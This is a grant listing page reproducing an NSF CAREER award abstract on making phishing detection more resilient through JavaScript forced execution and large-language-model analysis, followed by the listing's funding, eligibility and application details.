Skip to main content

CAREER: Defending Against Phishing Attacks beyond Reference-Based System

NSF

open

About This Grant

Phishing attacks represent a major cybersecurity threat affecting billions of Internet users worldwide. These attacks involve cybercriminals fabricating websites to look like legitimate ones, to trick users into revealing sensitive information such as login credentials. In response to escalating phishing threats, researchers have intensified their efforts to understand and counter these attacks. Researchers have also turned to machine learning and deep learning for detection solutions, with recent focus on "reference-based visual similarity models" that analyze visual elements such as logos and login forms. This approach compares potential phishing sites to legitimate ones. However, this method has two critical flaws. First, it lacks resilience against evolving evasion tactics which can effectively bypass phishing detectors. Second, countering these evolving tactics necessitates substantial human effort, including identifying vulnerabilities, curating ground-truth datasets, retraining models, and evaluating the updated models. This results in vulnerable time periods between the advent of new attack tactics and the deployment of updated models. This project is enhancing Internet user protection against phishing attacks by developing novel detection approaches that enhance resilience and minimize human efforts using forced execution of unexposed program elements and large language models (LLMs). The research aims to strengthen protection against phishing attacks by addressing two critical weaknesses in current detection systems: their vulnerability to evasion and their dependency on extensive human intervention. The project team conducts this through a dual approach. First, the project team conducts a systematic evaluation of state-of-the-art detection models to identify exploitable weaknesses and fundamental flaws. Second, based on these insights, the project team develops two novel detection mechanisms: a JavaScript forced execution technique that reduces dependency on reference-based visual elements, and an advanced system utilizing large language models (LLMs) that both narrows critical temporal gaps between new attack vectors and defensive updates and provides users with contextual semantic information for better threat assessment. This project extends beyond incremental security improvements by establishing more resilient, autonomous systems that minimize human oversight requirements while enhancing protective capabilities -- simultaneously advancing the theoretical understanding of phishing methodologies within the research community and delivering practical solutions that protect users against increasingly sophisticated social engineering threats. This award reflects NSF's statutory mission and has been deemed worthy of support through evaluation using the Foundation's intellectual merit and broader impacts review criteria.

Focus Areas

machine learningengineeringsocial science

Eligibility

universitynonprofitsmall business

How to Apply

Funding Range

Up to $349K

Deadline

2030-06-30

Complexity
Medium
Start Application

One-time $749 fee · Includes AI drafting + templates + PDF export

AI Requirement Analysis

Detailed requirements not yet analyzed

Have the NOFO? Paste it below for AI-powered requirement analysis.

0 characters (min 50)